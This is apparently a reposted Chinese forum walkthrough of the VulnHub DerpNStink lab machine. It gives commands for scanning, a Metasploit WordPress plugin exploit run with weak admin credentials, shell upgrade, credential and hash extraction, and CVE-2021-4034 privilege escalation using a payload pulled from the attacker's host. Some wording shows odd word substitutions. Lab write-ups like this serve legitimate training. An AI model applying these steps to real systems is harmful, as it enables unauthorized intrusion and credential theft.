【vulnhub】DerpNStink靶机

打印 上一主题 下一主题

主题 573|帖子 573|积分 1719

靶机安装

下载所在:DerpNStink: 1 ~ VulnHub
信息网络

靶机IP扫描
  1. nmap 192.168.93.0/24
复制代码


端口扫描,开放21、22、80端口
  1. nmap -A  192.168.93.158 -p-
复制代码


目录扫描
  1. dirsearch -u http://192.168.93.158
复制代码


进行网址访问,页面上只有个单词DeRPnStiNK,先记下来


点击检查,发现第一个flag


又发现存在一个文件/webnotes/info.txt进行访问




翻译一下


是需要更新当地DNS主机文件,思考应该是需要我们把IP和对应的域名进行添加到hosts文件中,但不知道域名是什么

后面拼接扫描出来的目录/php/phpmyadmin/看起来应该是一个可以登录到数据库里面的


拼接/robots.txt


继承访问


我们重新用另一下令进行目录扫描一下,会出现许多上面没有扫出来的目录,
  1. dirb  http://192.168.93.158
复制代码





weblog目录下存在登录页面,测试一下


发现进行了域名跳转到:https://derpnstink.local/weblog/,并且页面加载失败
因此大概前面的DNS更新应该是192.168.93.158与derpnstink.local/weblog/的对应关系添加


通过目录扫描出来的,还有目录//weblog/wp-admin/


尝试弱口令登录,成功 admin/admin





毛病利用

这个框架是WordPress,进行工具使用 wpscan 扫描,扫描到许多插件存在毛病
  1. wpscan --url http://derpnstink.local/weblog
复制代码


使用Slideshow Gallery 存在的毛病
因为我们知道后台的账户密码,以是我们用msf来进行getshell操作
开启msf情况
  1. msfconsole
  2. search slideshow                               
  3. use 1               
  4. show option
  5. set rhosts 192.168.93.158
  6. set targeturi /weblog/        #设置目标的url目录地址
  7. set wp_user admin
  8. set wp_password admin
  9. run
复制代码




先将获取到的shell变化为交互式的shell
  1. shell
  2. python -c 'import pty; pty.spawn("/bin/bash")'                # 获得交互式命令行
复制代码



翻看配置文件,发现了目标数据库的账号和密码
  1. cd /var/www/html/weblog
  2. ls
  3. cat wp-config.php
  4. root:mysql
复制代码




是数据库的账号和密码,回到页面进行登录,登录成功


访问 wp_posts 表发现 flag2.txt


在 wp_users 表发现两个账户密码


  1. unclestinky:$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
  2. admin:$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/
复制代码
破解之后是wedgie57


在靶机home目录下发现两个用户,mrderp/stinky


尝试切换到stinky用户,密码使用刚刚破解得到的wedgie57


成功切换到stinky用户,进入到stinky目录并查看当前目录的全部文件


在Desktop目录发现了flag3


提权

观察到ubuntu版本是14.04,大概存在一个毛病。
我刚开始用的是kali上面的searchsploit工具下令进行搜刮版本利用搜刮出来的脚本文件,但失败了,也大概是利用的脚本不对,各人可以多尝试几个脚本,看看能否成功,也希望与各人讨论
我在这找了一个有关版本的干系提权文件,有一个当地提权毛病CVE-2021-4034, 作用有点雷同于sudo,允许用户以另一个用户身份实行下令

  1. #这个提权漏洞利用脚本下载地址
  2. https://github.com/arthepsy/CVE-2021-4034
复制代码

将这个文件下载下来,复制到kali里面,并挂到服务上面
在反弹的交互式shell中,必须要进入tmp目录,否则无法下载
从kali的web端wget下来cve-2021-4034-poc.c,将其gcc编译输出。然后复权运行,即可提权成功。
  1. #下载命令
  2. wget http://192.168.93.130:8000/cve-2021-4034-poc.c
  3. #下载完成之后,权限修改
  4. chmod +x cve-2021-4034-poc.c
  5. #编译脚本
  6. gcc -pthread cve-2021-4034-poc.c -o cve-2021-4034-poc -lcrypt
复制代码




进行这个脚本运行,提权成功






免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

西河刘卡车医

金牌会员
这个人很懒什么都没写!

标签云

快速回复 返回顶部 返回列表